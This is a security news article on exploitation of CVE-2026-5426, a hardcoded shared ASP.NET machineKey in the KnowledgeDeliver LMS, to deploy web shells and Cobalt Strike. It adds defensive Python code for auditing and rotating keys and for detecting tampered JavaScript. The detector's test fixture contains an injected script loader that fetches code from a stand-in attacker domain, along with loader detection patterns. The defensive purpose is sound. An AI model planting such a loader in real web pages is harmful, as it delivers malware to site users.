Zero-day flaw in KnowledgeDeliver used to deploy web shells

Summary
– Hackers exploited a zero-day deserialization vulnerability, CVE-2026-5426, in KnowledgeDeliver LMS to deploy the Godzilla web shell.
– The flaw is caused by a shared hardcoded machine key in the web.config file across all KnowledgeDeliver customer deployments.
– Attackers used the machine key to sign malicious ViewState payloads, achieving remote code execution on the server.
– Mandiant responded to an attack where the exploit injected a script that tricked users into downloading a fake installer, infecting machines with a Cobalt Strike backdoor.
– The threat actor modified an application JavaScript file to load a malicious script, prompting users to install a fake “security authentication plugin.”
A critical zero-day vulnerability in the KnowledgeDeliver learning management system (LMS) has been actively exploited by hackers to deploy the Godzilla web shell. The attack targets servers running the platform and leverages a dangerous deserialization flaw to gain full remote control.
The vulnerability, cataloged as CVE-2026-5426, is a deserialization issue exploitable without any authentication. The root cause is a shared, hardcoded machine key embedded in the web portal's configuration file (web.config). Because the key is identical across all KnowledgeDeliver customer deployments, whoever extracts it from one installation can attack every other one.
Threat actors obtained this machine key and weaponized it in ViewState deserialization attacks. ASP.NET checks the MAC on incoming ViewState against the machineKey validationKey before deserializing it, so a malicious ViewState payload signed with the leaked key passes that check and is deserialized, giving the attacker code execution on the underlying operating system in the context of the application's worker process. No credentials are needed; the only thing the request has to get right is the signature.
Mandiant responded to an incident involving a KnowledgeDeliver server in late 2025. The researchers determined that the flaw was initially exploited as a zero-day to inject a malicious script into the web platform. “KnowledgeDeliver installations deployed before Feb. 24, 2026 relied on a standardized web.config file provided by the vendor. This configuration file contained hardcoded machineKey values used by the ASP.NET framework to encrypt and sign data, including ViewState payloads,” Mandiant explained.
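What the shared machineKey condition described in the two paragraphs above looks like in a web.config, and how an operator can audit two deployments for it and rotate the key, as an added example (not code from the article, from Mandiant or from the KnowledgeDeliver vendor; the configuration texts, site names and key material below are constructed placeholders, not any real key):

```python
"""Audit and rotate the ASP.NET <machineKey> in a web.config.

Added example; not code from the article, from Mandiant or from the
KnowledgeDeliver vendor. The two web.config texts below are constructed to
look like a vendor-shipped template copied to two customers, and the key
material in them is a placeholder, not any real key.
"""
import secrets
import xml.etree.ElementTree as ET
from typing import Dict, Optional

# Validation/decryption modes that predate HMACSHA256 and AES; flag them.
WEAK_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}
WEAK_DECRYPTION = {"DES", "3DES"}

# Constructed template: one static key, identical in every customer's copy.
VENDOR_TEMPLATE = """<?xml version="1.0"?>
<configuration>
  <appSettings>
    <add key="SiteName" value="{site}" />
  </appSettings>
  <system.web>
    <machineKey validationKey="{vk}" decryptionKey="{dk}"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""
PLACEHOLDER_VK = "A" * 128   # placeholder, not the leaked key
PLACEHOLDER_DK = "B" * 64
CUSTOMER_A_CONFIG = VENDOR_TEMPLATE.format(site="customer-a", vk=PLACEHOLDER_VK, dk=PLACEHOLDER_DK)
CUSTOMER_B_CONFIG = VENDOR_TEMPLATE.format(site="customer-b", vk=PLACEHOLDER_VK, dk=PLACEHOLDER_DK)


def _machine_key(config_xml: str) -> Optional[ET.Element]:
    return ET.fromstring(config_xml).find("system.web/machineKey")


def audit_machine_key(config_xml: str) -> Dict[str, object]:
    """Summarise the machineKey settings a reviewer cares about.

    A static key is not a defect by itself (a web farm needs one), but it must
    be unique to the deployment, use a modern MAC, and ViewState MAC checking
    must stay on. Sharing one key across deployments is the defect here.
    """
    root = ET.fromstring(config_xml)
    mk = root.find("system.web/machineKey")
    pages = root.find("system.web/pages")
    mac_on = pages is None or pages.get("enableViewStateMac", "true").lower() != "false"
    if mk is None:
        # AutoGenerate,IsolateApps is the framework default when the element is absent.
        return {"present": False, "static_key": False, "weak_algorithm": False,
                "viewstate_mac_enabled": mac_on}
    vk = mk.get("validationKey", "AutoGenerate")
    validation = mk.get("validation", "HMACSHA256").upper()
    decryption = mk.get("decryption", "Auto").upper()
    return {
        "present": True,
        "static_key": not vk.startswith("AutoGenerate"),
        "weak_algorithm": validation in WEAK_VALIDATION or decryption in WEAK_DECRYPTION,
        "viewstate_mac_enabled": mac_on,
    }


def shares_machine_key(config_a: str, config_b: str) -> bool:
    """True when two deployments carry the same static validationKey: the
    condition under which one leaked key signs valid ViewState for both."""
    ka, kb = _machine_key(config_a), _machine_key(config_b)
    if ka is None or kb is None:
        return False
    vk_a = ka.get("validationKey", "AutoGenerate")
    if vk_a.startswith("AutoGenerate"):
        return False
    return vk_a == kb.get("validationKey")


def rotate_machine_key(config_xml: str) -> str:
    """Return the config with fresh per-deployment keys: 64 random bytes for
    HMACSHA256 validation (128 hex chars) and 32 for AES decryption (64 hex
    chars), the sizes IIS Manager's "Generate Keys" emits."""
    root = ET.fromstring(config_xml)
    system_web = root.find("system.web")
    if system_web is None:
        system_web = ET.SubElement(root, "system.web")
    mk = system_web.find("machineKey")
    if mk is None:
        mk = ET.SubElement(system_web, "machineKey")
    mk.set("validationKey", secrets.token_hex(64).upper())
    mk.set("decryptionKey", secrets.token_hex(32).upper())
    mk.set("validation", "HMACSHA256")
    mk.set("decryption", "AES")
    pages = system_web.find("pages")
    if pages is None:
        pages = ET.SubElement(system_web, "pages")
    pages.set("enableViewStateMac", "true")
    # ElementTree drops the XML declaration; restore it for IIS.
    return '<?xml version="1.0"?>\n' + ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print("customer A audit:", audit_machine_key(CUSTOMER_A_CONFIG))
    print("A and B share a key:", shares_machine_key(CUSTOMER_A_CONFIG, CUSTOMER_B_CONFIG))
    print(rotate_machine_key(CUSTOMER_A_CONFIG))
```

Rotating the key invalidates every outstanding ViewState and forms-authentication ticket signed with the old one, so do it on all nodes of a farm at once and expect users to be logged out; rotation alone does not evict a web shell that was already written to disk, so the file system still has to be checked.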
The injected script tricked users into downloading a fake installer. This installer then infected the machine with a Cobalt Strike beacon, effectively planting a persistent backdoor. “The payload was encrypted using a key that used the name of the compromised organization, which indicated that the threat actor prepared this payload specifically for the targeted organization,” Mandiant noted in a report today.
The final payload was the Godzilla web shell, also known as BlueBeam. Microsoft observed this .NET-based, in-memory web shell in similar attacks in late 2024. In August 2024, researchers at cybersecurity firm ASEC also reported Godzilla being deployed in ViewState deserialization attacks targeting financial sector companies in ASP.NET environments.
Once inside, the threat actor ran commands through the web shell to extend their control over the web server's file system. They then modified an application JavaScript file so that it prompted users to install a “security authentication plugin” and loaded a malicious script from a domain under the attacker's control.
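A way to hunt for the tampering described above, as an added example that is not Mandiant's or the vendor's tooling: compare each shipped JavaScript file against a known-good hash manifest (assumed here to come from a clean install or the vendor package) and flag scripts that reference hosts outside a first-party allowlist or that build a dynamic script loader. The file contents, paths and hostnames below are constructed for illustration.

```python
"""Flag tampered application JavaScript and injected external loaders.

Added example for the intrusion described above; it is not Mandiant's or the
vendor's tooling. It assumes a hash manifest of the shipped JS files (taken
from a clean install or the vendor package) and an allowlist of first-party
hosts. File contents, paths and hostnames below are constructed.
"""
import hashlib
import re
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Assumed first-party hosts; script pulled from anywhere else is a lead.
ALLOWED_HOSTS: Set[str] = {"lms.example.test", "cdn.example.test"}

URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")
# Shape of a dynamic loader: document.createElement('script') ... .src = ...
LOADER_RE = re.compile(r"""createElement\(\s*['"]script['"]\s*\)""")

# Constructed clean file and a tampered copy with a loader appended to it.
CLEAN_JS = """// app bootstrap
var api = "https://lms.example.test/api/";
var lib = "https://cdn.example.test/lib/ui.js";
function init() { console.log("ready"); }
"""
TAMPERED_JS = CLEAN_JS + """
(function(){var s=document.createElement('script');
s.src='https://auth-plugin.example.invalid/loader.js';document.head.appendChild(s);})();
"""


def sha256_hex(content: str) -> str:
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


# Baseline manifest as it would be produced from a clean install (constructed).
BASELINE: Dict[str, str] = {"scripts/app.js": sha256_hex(CLEAN_JS)}


def external_hosts(js: str) -> Set[str]:
    """Hosts referenced by absolute URLs that are not on the allowlist."""
    hosts = set()
    for url in URL_RE.findall(js):
        host = urlsplit(url).hostname
        if host and host.lower() not in ALLOWED_HOSTS:
            hosts.add(host.lower())
    return hosts


def check_file(path: str, content: str, baseline: Dict[str, str]) -> List[str]:
    """Findings for one file: integrity against the manifest, then content leads."""
    findings = []
    if path not in baseline:
        findings.append("NOT_IN_BASELINE")
    elif sha256_hex(content) != baseline[path]:
        findings.append("HASH_MISMATCH")
    for host in sorted(external_hosts(content)):
        findings.append(f"EXTERNAL_HOST:{host}")
    if LOADER_RE.search(content):
        findings.append("DYNAMIC_SCRIPT_LOADER")
    return findings


def scan(files: Dict[str, str], baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Run check_file over a {path: content} map, keeping only files with
    findings, plus any manifest entry that is no longer on disk."""
    report: Dict[str, List[str]] = {}
    for path, content in files.items():
        findings = check_file(path, content, baseline)
        if findings:
            report[path] = findings
    for path in baseline:
        if path not in files:
            report[path] = ["MISSING_FROM_DISK"]
    return report


if __name__ == "__main__":
    for path, findings in scan({"scripts/app.js": TAMPERED_JS}, BASELINE).items():
        print(path, findings)
```

Treat the content checks as leads rather than verdicts: many applications load script dynamically and legitimately reference third-party hosts, so the manifest comparison is the authoritative signal and the host and loader checks exist to prioritise which mismatches to read first.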
This incident is part of a broader trend. Over the past year, hackers have repeatedly exploited improperly secured machine keys in ViewState deserialization attacks. In March 2025, threat actors abused a hardcoded machine key to attack Gladinet CentreStack file-sharing servers. In July 2025, hackers compromised 85 Microsoft SharePoint servers after stealing the machine key to create signed malicious ViewState payloads. State-sponsored actors have also used these attacks to deploy the WeepSteel reconnaissance tool on Sitecore servers that exposed their ASP.NET machine key.
(Source: BleepingComputer)
